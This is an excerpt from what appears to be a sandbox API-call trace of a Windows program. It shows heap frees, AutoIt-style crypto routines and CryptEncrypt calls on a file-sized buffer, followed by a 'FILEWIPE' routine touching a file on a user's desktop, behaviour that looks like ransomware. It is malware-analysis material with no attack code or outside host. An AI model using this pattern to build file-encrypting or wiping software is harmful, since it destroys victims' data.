1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.605] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.606] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a7978 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.606] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.606] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.607] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.607] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.607] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.608] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.608] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x68eb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x68f0) returned 1 [0075.608] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.608] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.608] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.608] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.609] CharLowerBuffW (in: lpsz="byte[26865]", cchLength=0xb | out: lpsz="byte[26865]") returned 0xb [0075.609] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.609] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.609] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.609] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a31e8*, pdwDataLen=0x61e2d8*=0x68eb, dwBufLen=0x68f0 | out: pbData=0x7a31e8*, pdwDataLen=0x61e2d8*=0x68f0) returned 1 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.610] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.610] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.610] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.610] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.610] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.611] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.611] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.611] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.615] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.615] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.615] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.615] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.615] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.615] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0075.615] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.615] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.615] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.615] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.615] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.615] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.615] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.615] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.616] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.616] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.616] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.616] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.616] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.616] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.616] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.616] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.617] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.617] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.617] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.617] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.617] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.617] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.618] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.619] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.619] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.619] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.619] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.620] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0x54cf4160, ftLastWriteTime.dwHighDateTime=0x1d5d880, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0x6b8b38 [0075.620] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.620] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.620] 